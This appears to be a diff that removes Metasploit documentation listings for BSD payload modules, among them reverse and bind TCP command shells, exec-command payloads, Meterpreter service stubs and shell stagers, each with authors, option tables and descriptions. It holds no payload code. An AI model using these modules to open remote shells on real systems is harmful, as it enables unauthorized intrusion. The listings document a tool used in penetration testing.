|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/bsd/vax/shell_reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: vax
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 100
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
wvu <wvu@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,33 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Execute Command
|
|
||||||
Module: payload/bsd/x64/exec
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 23
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
joev <joev@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD yes The command string to execute
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Execute an arbitrary command
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Command Shell, Bind TCP Inline (IPv6)
|
|
||||||
Module: payload/bsd/x64/shell_bind_ipv6_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 90
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,40 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Shell Bind TCP
|
|
||||||
Module: payload/bsd/x64/shell_bind_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 136
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
nemo <nemo@felinemenace.org>
|
|
||||||
joev <joev@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD /bin/sh yes The command string to execute
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Bind an arbitrary command to an arbitrary port
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/bsd/x64/shell_bind_tcp_small
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 88
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,46 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6)
|
|
||||||
Module: payload/bsd/x64/shell_reverse_ipv6_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 105
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,47 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Shell Reverse TCP
|
|
||||||
Module: payload/bsd/x64/shell_reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 98
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
nemo <nemo@felinemenace.org>
|
|
||||||
joev <joev@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD /bin/sh yes The command string to execute
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,45 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD x64 Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/bsd/x64/shell_reverse_tcp_small
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 81
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,35 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Execute Command
|
|
||||||
Module: payload/bsd/x86/exec
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 16
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
snagg <snagg@openssl.it>
|
|
||||||
argp <argp@census-labs.com>
|
|
||||||
joev <joev@metasploit.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
CMD yes The command string to execute
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Execute an arbitrary command
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,49 +0,0 @@
|
|||||||
|
|
||||||
Name: FreeBSD Meterpreter Service, Bind TCP
|
|
||||||
Module: payload/bsd/x86/metsvc_bind_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 0
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Stub payload for interacting with a Meterpreter Service
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,56 +0,0 @@
|
|||||||
|
|
||||||
Name: FreeBSD Meterpreter Service, Reverse TCP Inline
|
|
||||||
Module: payload/bsd/x86/metsvc_reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 0
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Stub payload for interacting with a Meterpreter Service
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,45 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Bind TCP Stager (IPv6)
|
|
||||||
Module: payload/bsd/x86/shell/bind_ipv6_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 63
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
hdm <x@hdm.io>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Listen for a connection over IPv6
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,43 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Bind TCP Stager
|
|
||||||
Module: payload/bsd/x86/shell/bind_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 54
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Listen for a connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
|
||||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Find Tag Stager
|
|
||||||
Module: payload/bsd/x86/shell/find_tag
|
|
||||||
Platform: BSD
|
|
||||||
Arch: x86
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 40
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
skape <mmiller@hick.org>
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Spawn a command shell (staged).
|
|
||||||
|
|
||||||
Use an established connection
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
EnableStageEncoding false no Encode the second stage payload
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
|
||||||
